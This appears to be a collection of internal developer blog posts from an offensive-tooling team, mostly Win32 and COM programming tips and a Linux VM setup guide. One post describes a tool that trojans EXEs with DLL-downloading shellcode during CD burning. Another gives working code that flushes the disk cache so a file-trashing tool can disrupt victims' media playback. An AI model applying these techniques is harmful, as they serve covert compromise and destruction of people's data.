    hReturn = pITask->Run(); // So... basically windows is lying to us in every possible way below. BOOL bRunning = FALSE; INT32 iCount = 0; HRESULT hrStatus = 0; DWORD taskExitCode = 0; SYSTEMTIME pstLastRunTime = { 0 }; hReturn = pITask->GetStatus(&hrStatus); if (hrStatus == SCHED_S_TASK_RUNNING) { DEBUGPRINT(eMT_Info, L"Task is running\r\n"); bRunning = TRUE; } hReturn = pITask->GetExitCode(&taskExitCode); if (hReturn == S_OK) { DEBUGPRINT(eMT_Info, L"Task ran with exit code %d", taskExitCode); bRunning = TRUE; } hReturn = pITask->GetMostRecentRunTime(&pstLastRunTime); if (hReturn == S_OK) { DEBUGPRINT(eMT_Info, L"Task ran on %.2d/%.2d/%.4d %.2d:%.2d:%.2d", pstLastRunTime.wMonth, pstLastRunTime.wDay, pstLastRunTime.wYear, pstLastRunTime.wHour, pstLastRunTime.wMinute, pstLastRunTime.wSecond); bRunning = TRUE; }

    #liesAndTheLyingOperatingSystemsWhoTellThem
    #getoffmylawn
  • [User #71473]: When Creating A Process Is Destroying *Your* Process
    Ever call CreateProcessW and your current process goes *poof*?  Its one of those nasty gotchas of Win32 programming that is easy to miss if you just skim the documentation.  Check out the function signature...

    BOOL WINAPI CreateProcess(
      _In_opt_     LPCTSTR lpApplicationName,
      _Inout_opt_  LPTSTR lpCommandLine,
      _In_opt_     LPSECURITY_ATTRIBUTES lpProcessAttributes,
      _In_opt_     LPSECURITY_ATTRIBUTES lpThreadAttributes,
      _In_         BOOL bInheritHandles,
      _In_         DWORD dwCreationFlags,
      _In_opt_     LPVOID lpEnvironment,
      _In_opt_     LPCTSTR lpCurrentDirectory,
      _In_         LPSTARTUPINFO lpStartupInfo,
      _Out_        LPPROCESS_INFORMATION lpProcessInformation
    );
    

    Now, pay close attention to that 2nd argument.  Notice that unlike lpApplicationName, the lpCommandLine is not marked as constant.  That's a hint that the function might mess with the contents.  Its a bit more subtle than that though...
    "The Unicode version of this function, CreateProcessW, can modify the contents of this string. Therefore, this parameter cannot be a pointer to read-only memory (such as a const variable or a literal string). If this parameter is a constant string, the function may cause an access violation." – MSDN
    So... the weird thing is that doing what you shouldn't do (pass constant data into a non-constant parameter) is actually totally okay if you are working with ASCII data.  Call CreateProcessA all day long with a hardcoded string as the lpCommandLine and everything is groovy.  Call CreateProcessW just once like that, and its gonna crash, 100% of 100%.  That "can modify the contents of this string" should be read as "will try to modify the contents of this string every. Single. TIME, and will ruin your day if you pass us a constant string every. Single. TIME".
    I know this – I've seen it repeatedly and it has bit me and my coworkers in the keister repeatedly because no matter how many times I see this, I always forget.  If I'm lucky it will suddenly dawn on me while meditating on the code.  If I'm unlucky, it won't be until I debug through every line of code or shove a messagebox or print statement before and after every block that it will hit me again.
    Let's not have this happen to you.  Copy your constant string to a buffer if you are going to use the lpCommandLine.  Or, if you don't require arguments, you can ignore lpCommandLine altogether because:
    "The lpCommandLine parameter can be NULL. In that case, the function uses the string pointed to by lpApplicationName as the command line." – MSDN

    Remember kids:

    //Bad! CreateProcess(NULL, L"myapp.exe", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);   //Good! WCHAR szCommandLine[MAX_PATH] = {0}; wcscpy(szCommandLine, L"myapp.exe"); CreateProcess(NULL, szCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);   //Also Good! CreateProcess(L"myapp.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);

    Happy Coding, whippersnappers!

    #windoze
    #getOffMyLawn
  • [User #71473]: I Just Want To Know If That Process Is Running As Admin... Is That So Wrong?
    I've been working on updating some unit tests with more Awesome(tm), and one of the issue I ran into was that one of the components under test was running a payload in different contexts depending on the target operating system and UAC status.  My payload is a simple Dummy executable written by User #1179925 that drops a text file to the desktop of the currently logged in user.  Depending on whether the payload is running as SYSTEM, an Administrator (elevated) user or a Limited (non-elevated) user, it drops either user.txt, admin.txt or system.txt.  Seems like it would be easy to check whether the test ran as expected, right?  Nope, of course not.  Nothing worth doing is ever easy in Windows.
    Here's the rub – I have a testcase that tests the component Create Process As Current User +Admin (CreateProcessAsUser_LEP - Leopard) SECRET.  As the name implies, this uses the CreateProcessAsUser API call to run User, Admin or System process from a System context – handy when running as a service and you need to interact with the desktop, or receive certain Windows messages that are not propagated to Session 0.  The intent is that by setting certain the execution level parameter, you can selectively run as a Limited User, Admin User or a specified Process (which can be used to impersonate just about anything).  The test case was written to first run with eUser, then eAdmin, then eProcess with a SYSTEM process, producing in sequence user.txt, admin.txt and system.txt.  This works just fine on Vista+ with UAC enabled.  Unfortunately, as coded the test fails on XP and 2003 and also on any machine that has UAC disabled – which includes all of the server VMs on DART.  The "user" test was actually running as admin in these scenarios because, well, the user was an Admin account on XP and 2003 and was a permanently elevated Admin account on 2008 - 2012R2.  I could do something hackish and inelegant like check the version number and assume admin on those OSes where I know the DART VMs have UAC disabled, but that would break real machines where limited users might actually exist and/or UAC might be enabled.  Seems like a bad way to test... but I need that green check User #76978 in Bamboo like yesterday.  What to do, what to do.
    My main issue of course was the pesky user task that sometimes dropped files named "user.txt" and sometimes dropped files named "admin.txt".  I could just check for either and consider that success... and I did that for a while, but it just seemed wrong.  I want to know I was running as the user I should be running as on the target system.  Being a good little engineer, I decided the best way to proceed was to find out which user and optionally what elevation level the payload process used when it executed.  Sounds simple enough, right?  I went hunting for ways to find out if a process was running as an Administrator and found some nice MSDN sample code:

    BOOL isAdmin() { BOOL b; SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; PSID AdministratorsGroup; b = AllocateAndInitializeSid( &NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup); if(b) { if (!CheckTokenMembership( NULL, AdministratorsGroup, &b)) { b = FALSE; } FreeSid(AdministratorsGroup); }   return(b); } 

    Looks fairly straightforward except for that heinous AllocateAndInitializeSid call (there's actually cleaner ways to do that in XP+), but hey, its from MSDN so it has to be old school.  Note the NULL handle in CheckTokenMembership... that means check my current security token, which tells me who I am running as.  Not quite what I want, but I should be able to easily get a token from the process I want to query, right?  We can handle that with two calls, like so:
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if (hProc) { //Open Process Token HANDLE hProcToken = NULL; if (OpenProcessToken(hProc, TOKEN_ALL_ACCESS, &hProcToken)) { if (isAdmin(hProcToken)) // Awesomeness ensues, right? { . . .

    We can then pass that ProcessToken into our new BOOL isAdmin(HANDLE hToken) function and use it in the CheckTokenMembership call.
    Right?
    ...NOPE!
    The CheckTokenMembership call fails with error 1309: "An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client."  Well poop.  That doesn't sound good.  It took me hours of hunting to figure out that the ProcessToken we got wasn't awesome enough to do what we needed, because it is a Primary token, which is only good for identification.  Enter DuplicateTokenEx, which lets us turn our useless (for our current intent) Primary token into a useful Impersonation Token.  Then, once we have it, we have to impersonate, or our useful token will remain useless.  The new function looks like this:

    BOOL isAdmin(HANDLE hToken) { BOOL b = FALSE; HANDLE hTokenDupe = NULL; SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; PSID AdministratorsGroup;   if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenImpersonation, &hTokenDupe) != 0) { // Impersonate if (!SetThreadToken(NULL, hTokenDupe)) { return FALSE; } SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; b = AllocateAndInitializeSid( &NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup); if(b) { if (!CheckTokenMembership(hTokenDupe, AdministratorsGroup, &b)) { b = FALSE; } }   if (hTokenDupe != NULL) { SetThreadToken(NULL, NULL); } CloseHandle(hTokenDupe); FreeSid(AdministratorsGroup); }   return (b); }

    It took me the better part of two days to figure this out – I thought I might need to Duplicate the handle, but I didn't realize I needed to impersonate until I finally checked GetLastError on the CheckTokenMembership call and saw that 1309 error.  Even then, it seemed like nobody writing C++ ever cared about doing isAdmin on another process or knew how to resolve error 1309 issues.  Fortunately, Delphi folks posting in German (always a badge of true hackerdom) were all over it, and I finally, FINALLY pieced together enough of the puzzle from the occasionally garbled Google translation to figure out the missing pieces.

    #thereGoes18HoursI'llNeverGetBack
    #getOffMyLawn




  • [User #71473]: Confluence Chat is now Available
    Just in case you didn't notice the little chat icon in the lower right corner of your screen.

    #whoPutThisFacebookInMyConfluence
    #getoffmylawn
  • [User #71473]: OMG THE MENU BAR IN VISUAL STUDIO 2013 WON'T STOP YELLING AT ME
    If you're a sane human being, you probably find Microsoft's new ALL UPPERCASE MENUBAR "aesthetic" exceedingly irritating.  Thankfully, a little regedit or powershell foo can fix this eyesore.
    Open up powershell and type the following:
    Set-ItemProperty -Path HKCU:\Software\Microsoft\VisualStudio\12.0\General -Name SuppressUppercaseConversion -Type DWord -Value 1 
     If you happen to be using VS 2012, change the 12.0 to 11.0 and it should work like a charm.
    You can, of course, set this key with regedit too.  Doing so is left as an exercise for the reader.

    #THISISMESHOUTINGATYOUMICROSOFT
    #getoffmylawn

  • [User #71473]: Inception - A DLL inside a DLL inside another DLL that hooks your CD burner and injects DLL downloading shellcode into EXEs. What's not to understand?
    Classification Banner

    As some of you may know, I recently wrapped up development on HammerDrill v2.0, an optical media gap jumping tool.  Part of the functionality is the ability to detect the startup of Nero processes via asynchronous WMI queries (a blog post unto itself right there) and then inject a function hooking DLL that enables me to modify the read buffer in the ReadFile() call.  I use this to trojan qualifying Windows EXE files with an entrypoint hijacking shellcode blob that pulls down an arbitrary DLL and loads it into the trojaned process.  The technique I developed for performing the DLL injection is called Inception (based on the ridiculous nesting of DLLs and shellcode involved), and it was my first foray to DLL injection from memory.
    Since I was a noob and was using the open source Memory Module code (which does not actually perform injection), I was not exactly keen to re-engineer that unfamiliar code for resolving imports, relocations and other assorted fixups so that I could perform all of that ridiculous pointery math using ReadProcessMemory() and WriteProcessMemory() in the remote process.  It sounded like a bad time... and when I started developing the Inject Dll From Memory Into A Remote Process (InjectLibraryFromMemory_HYPD - Hypodermic) SECRET technique I learned just how bad of a time it would be.  Pointer math is much easier when the pointers are local to your process.  Just sayin.  Given my trepidation, I decided it would be easier to write a simple shim DLL that used portions of the Memory Module code to do fixups on itself, call its own entrypoint for initialization, and finally memory load an embedded payload DLL that would just magically work(tm).
    The coding was a little easier than doing everything from the loading process, but I was left with the dependency that HammerDrill (itself a memory loaded DLL) now needed to carry a DLL inside of another DLL so that it could inject while it injected. Or something. It made the build process a little ugly – HammerDrillDLL depends on the MemoryShimLoaderDLL, which depends on the NeroHookFunctionsDLL, and a custom build step encrypted and compressed the output of each build stage into a header file that was included in the next stage.  Ugly
    I've been mulling over solutions to this recently when it hit me: the loader (HammerDrill) can inject a structure containing the payload DLL into the remote process as an argument to the shim DLL.  This would enable me to write a PayloadDeployment library that contains a precompiled Shim DLL (since it shouldn't have to change) and the caller simply supplies the argument structure containing the payload.  The .execute() method of the module would then inject the stub and the argument (i.e., payload) into the remote process and call the exported ordinal with a pointer to the injected structure.  The stub fixes itself up, interprets the structure as needed and then memory loads the payload.  Variant classes would support Fire and Forget v2 and ICE DLLs with minimal modifications.
    Boom, diversity.  

    #WINNING
    #obliqueXzibitReference
    #getoffmylawn

    Classification Banner
  • [User #71473]: Wait, didn't I just securely delete that file?
    SECRET//NOFORN

    So User #71468 is working on a tool to (among other things) trash somebody's files.  Handles are being stolen, files are being corrupted, it's all good!  It reminded me of another tool written by User #75251 back in the day with a little help from yours truly.
    We were trashing data.  It was awesome.  We were even overwriting files opened for exclusive write by using direct writes to the physical drive (XP only folks, Vista and up broke the ability to do that.)  We were targeting multimedia files, and the requirements said "thou shalt interrupt playback".  We figured trashing the files at such a low level would obviously stop the playback, right?  No bytes, no playback?  Turns out, we were wrong.  The system's filesystem read cache was happilly keeping the entire file in memory and the media player was happily playing it from the cache as if nobody had come in and barfed garbage bytes all over the clusters.  Frustration ensued.  Rage++... but what were we to do?
    The answer came from a single StackOverflow post that mentioned a side-effect of opening a volume handle in a peculiar way.  Although the author of the post cautioned the technique may not be reliable, we found in our testing that it was 100% effective on our target platform (Windows XP x64).
    Here's the code in question:
    // we have a global volume handle for use by our direct write calls HANDLE hVolHandle = INVALID_HANDLE_VALUE;   BOOL FlushCache() { // close the volume handle if it is currently open so we can reopen it with MAGIC! if (hVolHandle != INVALID_HANDLE_VALUE) { CloseHandle(hVolHandle); hVolHandle = INVALID_HANDLE_VALUE; }   // Notice the FILE_SHARE_READ without FILE_SHARE_WRITE... you can't open a volume handle for exclusive write... HANDLE hFile = CreateFile(m_szVolumeName, FILE_READ_DATA, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); // this is really all we need, allegedly if (hFile != INVALID_HANDLE_VALUE) { //we should never be able to open a volume this way, but if we somehow did, we need to close that funky handle CloseHandle(hFile); } else { DWORD le = GetLastError(); // if we failed for any reason other than a sharing violation or access denied, then it didn't work.   // In this case, ERROR_ACCESS_DENIED or ERROR_SHARING_VIOLATION are the expected results -- GREAT SUCCESS! if (le != ERROR_SHARING_VIOLATION && le != ERROR_ACCESS_DENIED) { return FALSE; } } if (hVolHandle == INVALID_HANDLE_VALUE) { // reopen the handle with normal permissions if( (hVolHandle = CreateFileW(m_szVolumeName, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_WRITE_THROUGH | FILE_FLAG_NO_BUFFERING, NULL)) == INVALID_HANDLE_VALUE ) { return FALSE; } } return TRUE; }

    Once we added that function in and called it after trashing a certain number of bytes or files, we suddenly started seeing playback of media files interrupted as requested by the customer.  And it was good.
    Now, with the way User #71468 is stealing handles, he may not actually need this technique.  But if he does, it will be right here waiting for him.

    #getoffmylawn
    #obliqueRichardMarxReference


    SECRET//NOFORN
  • [User #71473]: MSDN Lies! (or, How Not To Fail at COM initialization in somebody else's process)
    Like me, some of you may bear the unfortunate burden of developing Windows tools that rely on COM.  COM is a brutal and difficult User #72901 that is the sad baggage that comes along with the sweet and glorious awesomeness of WMI.  All the whippersnappers who have only done WMI from C# or Powershell don't even know the pain of COM because Microsoft shields these noobs from the crufty underbelly that C++ programmers can't get away from.
    If you've ever looked at the MSDN WMI examples, you've probably noticed the 5 pages of boilerplate code needed to run one simple WMI query.  Like me, you probably believed that MSDN knew what the hell they were doing given the copious error checking they include in their code.  Sadly, our belief is built on a lie, because MSDN does COM wrong.  Their error checking actually masks a nasty little problem that will repeatedly bite you in the posterior if you dare use WMI in different libraries in your code, or, heaven forbid, injected into another process that also happens to be using COM.
    Take a look at the following monstrosity:
    // Step 1: -------------------------------------------------- // Initialize COM. ------------------------------------------ hres = CoInitializeEx(0, COINIT_MULTITHREADED); if (FAILED(hres)) { cout << "Failed to initialize COM library. Error code = 0x" << hex << hres << endl; return 1; // Program has failed. } // Step 2: -------------------------------------------------- // Set general COM security levels -------------------------- // Note: If you are using Windows 2000, you need to specify - // the default authentication credentials for a user by using // a SOLE_AUTHENTICATION_LIST structure in the pAuthList ---- // parameter of CoInitializeSecurity ------------------------ hres = CoInitializeSecurity( NULL, -1, // COM authentication NULL, // Authentication services NULL, // Reserved RPC_C_AUTHN_LEVEL_DEFAULT, // Default authentication RPC_C_IMP_LEVEL_IMPERSONATE, // Default Impersonation NULL, // Authentication info EOAC_NONE, // Additional capabilities NULL // Reserved ); if (FAILED(hres)) { cout << "Failed to initialize security. Error code = 0x" << hex << hres << endl; CoUninitialize(); return 1; // Program has failed. }

    All that code just to get COM up and running... and it's wrong.  They dutifully use the FAILED() macro, which normally means that any success conditions (even vaguely abnormal ones like S_FALSE) don't cause the function to bail out.  In fact, CoInitializeEx() returns S_FALSE if COM is already initialized, which would make one think that other non-fatal errors would be S_XXXX as well.  Unfortunately, CoInitializeSecurity has a similar condition where it is already initialized, but returns a failure condition (RPC_E_TOO_LATE) instead even though you may be able to safely proceed anyway.  This is especially likely to happen if you have injected into a process already using COM and want to use it yourself.  If your code looks like the above, it will fail to do any of your awesome WMI stuff because you've dutifully assumed that FAILED actually only catches failures... and RPC_E_TOO_LATE isn't really a failure as much as it is a polite note that somebody got here first and you have to make due with their security settings.
    Another little gotcha is that MSDN claims you don't even have to call it if you don't want to: "If a process does not call CoInitializeSecurity, COM calls it automatically the first time an interface is marshaled or unmarshaled, registering the system default security. No default security packages are registered until then."  Whether or not the automatic call handles the RPC_E_TOO_LATE error is unknown.  Handling it yourself is easy enough though... just check for hres != RPC_E_TOO_LATE, like so:
    if (FAILED(hres) && hres != RPC_E_TOO_LATE) { cout << "Failed to initialize security. Error code = 0x" << hex << hres << endl; CoUninitialize(); return 1; // Program has failed. }

    And there you have it.  Your code won't bail out early just because somebody else is playing in the filthy COM cesspool with you.
    #getoffmylawn

  • [User #71473]: Setting up DART on Linux Mint 17.1
    If a you're an insufferable curmudgeon like me then you absolutely hate what Fedora and Ubuntu have done to their GUIs in the last several years.  If you're looking for a better Linux environment for working with DART, I humbly offer up Linux Mint 17.1 running the Cinnamon Desktop.  You can find the DVD ISO at \\fs-01\share\OS DVD ISOs\Linux Mint 17.1 – download this to your local system before proceeding with the steps below.
    To setup a DART VM using Mint on VMware:
    1. Go to File->New Virtual Machine.
    2. Choose Typical then click Next
    3. Select I will install the operating system later then click Next
    4. Select Linux as the guest operating system and select Ubuntu 64-bit as the version, then click Next.
    5. Choose a name and location for the VM. Linux Mint 17.1 64-bit (DART) is a nice descriptive name.  Click Next
    6. Adjust your disk size as you see fit.  I went with 50GB just to be on the safe side.  Click Next
    7. Click the Customize Hardware... button and adjust your RAM and CPUs to suit your preferences.  I went with 4 GB of RAM and 2 CPUs with 2 cores apiece. 
    8. Click on CD/DVD and select Use ISO image file – enter the local path to the Linux Mint 17.1 ISO here.  Once you are done tweaking the hardware and setting up the path to the ISO, click Close and then Finish
    9. Power on the new Virtual Machine.  The machine should automatically boot into the Live DVD Linux Mint environment.
    10. Once the Mint GUI loads (hey look – a traditional menu, taskbar and quick launch!), you should see a link to Install Linux Mint sitting on the desktop.  Double click the icon.
    11. Select your language then click Continue
    12. The next screen will probably complain about not having internet connectivity.  You can safely ignore this because we can use the Ubuntu repository mirrors on repo.devlan.net to pull updates and software later – just click Continue to proceed
    13. On the Installation Type screen, choose Erase disk and install Linux Mint (easy-mode) or, if you have a specific partitioning scheme in mind, Something else.  Check the other two options at your discretion.  Click Install Now when you are done futzing around.
    14. You'll get a dialog summarizing the changes that will be made to the disk.  If everything is to your liking, click Continue
    15. Pick your time zone, then click Continue
    16. Pick your keyboard layout, then click Continue
    17. The final screen of the wizard sets up your primary user and machine name.  This user will be automatically added to the sudoers file, so consider this your "admin" account.  Try to make the machine name somewhat unique to avoid collisions on the network.  By default, the name will be [username]-virtual-machine, which may be a little too generic if you build more than one Mint VM.  I recommend something like [username]-mint-DART-vm – that way if you have a 2nd Mint VM for other uses, you can just change DART to some other meaningful description.  Don't forget to set the password – it's required.  Click Continue when you are all done setting up your username and whatnot.
    18. Watch the installation proceed.  This should take maybe 5-10 minutes or so.  The system will try to reach out to several Mint and Ubuntu repos online, which slows things down a little, but we'll fix that later...
    19. When installation completes, click Continue Testing.  Click the Finished installing button on the VMware prompt at the bottom of the screen if it appears, then click Menu and select the Quit option (looks like a power button) to shutdown the VM.  Click Shutdown from the dialog that pops up.
    20. Once the VM shuts down, go to VM->Settings... on the VMware menu and change the CD/DVD drive from Use ISO image file to Use physical drive, then click OK
    21. Power on the VM and your newly installed Mint should boot
    Woot!  Now you have a working Mint VM.  You still need to do a couple things to get your DART setup completed.
    First of all, you're probably going to want to setup VMware tools – drag and drop support is probably the cleanest way to copy your ssh keys to the system, so lets get that enabled.
    1. If a VMware prompt appears at the bottom of the screen after boot, click the Install Tools button.  Otherwise, go to VM->Install VMware Tools... from the VMware menu.
    2. When the contents of the VMware Tools CD appear in the VM, open a terminal window by clicking the terminal icon on the taskbar.  If you can't find it, click Menu and type terminal in the search box.
    3. In the terminal window, enter the following commands (replace username with your username):
      cp /media/username/VMware\ Tools/VMwareTools-*.tar.gz . tar xvzf VMWareTools-*.tar.gz cd vmware-tools-distrib sudo ./vmware-install.pl
    4. Enter your password to proceed with installation.  You can select defaults for most of the prompts by simply pressing Enter– you may not care about Thinprint, so go ahead and type "no" here, but for all other prompts it is safe to go with the default.
    5. When the script is finished, type sudo /usr/bin/VMware-user to start the VMware tools daemon, then logout of your X-Windows session by selecting Menu->Log Out (one button above the Quit button), then clicking Log Out on the dialog that appears.
    6. Log in again and verify that drag-and-drop is working by dragging something from your host to the VM.  If the file copies successfully, we can proceed to setting up your ssh keys.  Open the file manager by clicking the Files icon on the taskbar.   If you can't find it, click Menu and type files in the search box.
    7. Press CTRL+H to show hidden files – otherwise you may not be able to see your .ssh folder after copying it.  Navigate to your .ssh folder on the host and drag it into the file manager window.
    8. Double click into the newly copied .ssh folder.  Highlight all of the files and right click.  Select Properties from the popup menu, then click the Permissions tab.
    9. Change the Group and Other permissions to None, then click Allow executing file as program until the checkbox is cleared.  Click Close
    The next thing we need before we can setup DART is to install git.  Unfortunately, right now Mint wants to reach out to the interwebs to install everything.  A cheap way to fix this is to just trick it by editing the hosts file.  I'm sure there's a better way to do this that involves editing some obscure config file, but this is good enough for now.
    1. In your terminal window, type sudo vi /etc/hosts – or use nano in place of vi if you are a total noob (like User #7995631).
    2. Add the following two lines immediately after the two 127.0.0.1 entries and then save the file:
      10.2.0.222 archive.ubuntu.com 10.2.0.222 security.ubuntu.com
    3. ping the two domains above to make sure the IPs are resolving properly.
    4. If the ping worked, then you can install Git by typing sudo apt-get install git
    5. Once git is installed, you can truck on over to https://stash.devlan.net/projects/TYR/repos/edg/browse and follow the instructions there to finish setting up your DART environment.  Note that on Step 6, the command should read:

      from ~/dart/tyrant/tyworkflow run ./bin/remote_commit -u run .plans.basic_plan
     Enjoy your non-sucky DART environment, and tell Ubuntu and Fedora to go pound sand with their annoying, tablet style GUIs.
    #getoffmylawn

Home pages:


No comments: